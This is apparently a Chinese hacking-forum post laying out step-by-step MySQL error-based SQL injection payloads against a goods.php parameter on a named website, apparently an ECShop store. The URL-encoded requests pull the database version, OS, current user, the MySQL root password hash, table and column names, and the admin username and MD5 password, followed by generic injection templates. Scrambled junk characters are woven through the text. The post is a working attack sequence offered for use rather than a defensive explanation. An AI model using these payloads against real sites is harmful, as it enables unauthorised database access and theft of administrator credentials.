找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 2833|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
$ U4 @8 B4 G' Q. w9 s; [http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ D1 d7 |( \& p3 u8 T. V/ H3 e3 A1 G$ Y0 V8 i4 W6 x9 g: h
判断系统( E8 p7 k; u* ~" g, @

3 ^9 H( g- d/ p, c+ D  D/ Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
" O/ ^/ k2 A8 S- M: S1 D, ^
( k3 m2 v4 \+ S9 }0 U+ `
5 H9 s, ]  ~: y) F. k# L7 j3 i  I. I' E( L9 f4 v3 a
当前 user()0 `" r, I/ p9 a! P+ u& p5 D  N
1 K# p2 F  {' ]. X8 v4 d  |
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 X4 T2 h9 N5 @- Z* R9 D1 f
; ~  q: b* d# ~& i& u9 {: Z+ u
/ ?7 `. m5 ~" J6 W' f& V+ q8 j. v4 z9 Z4 B
当前 database(); F$ C- c# @: v' {/ A. w% f
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 B7 ~2 @( E1 r- h1 r8 s0 u

7 Y( F2 |8 a4 k/ ?2 v; t4 M! y( l+ L% q: f3 r
7 T: H' e1 p* [
/ w) c* x2 E( z' A$ Y$ u: {# m
root hash
# I( c) v' K6 b/ e" E/ o' F9 n$ R- M
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" n/ l9 h& Y. u0 |  I

. _" e6 b/ R  j; R  x' A8 p- q; r1 U
" P+ ~, ]2 Y1 v: n& U
当前 数据库表名6 k( S4 T) Z9 x, O/ m5 k6 t
1 A3 E( j  U- p7 }3 q* t# e0 ]6 `4 P
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
. a0 [. |2 i) c* j2 k2 \) R' _
7 N; p: A( M5 v
9 m6 ?& J; q" e( U6 a3 B: e7 ^$ J
  I0 }6 \5 S! n6 F1 g$ f当前 数据库 user_name 字段
+ G/ |& Y7 \/ r3 B: \
- E9 q1 ?" d" j" D3 G( j' whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. _( z! u* R# O5 Z
5 h" M: p5 M0 j7 E3 J
当前 数据库 字段 password
' M, v3 U3 {9 E, r+ P# e2 g$ y! b: xhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ X( O/ Q4 L7 ?9 v; _) F6 \
+ [7 b: X. _8 b" l; M5 z+ @
# t$ m8 |5 p( z1 K. t6 P- m3 E
' E' B6 M$ Q  \" h6 E. P  ]2 [% g
获得 admin passwd(md5)' ]! g* i" _8 P( Y( G$ z, `

, a" _( E* d! @5 E% j5 s# R) m7 T8 v9 _1 z. x4 a
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23$ x3 a# N+ n5 z& a! ]& l

, ?: U( Q/ j( q0 B报错注射& l9 r7 h! f( S( O4 _# B- a
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)& ]$ p/ ], w% k( D

9 h6 e& \, ]5 @. V: W5 ZSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)  P. M4 Z% R/ {% y

$ a. }! h- Z, r$ j7 ~  B1 band(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表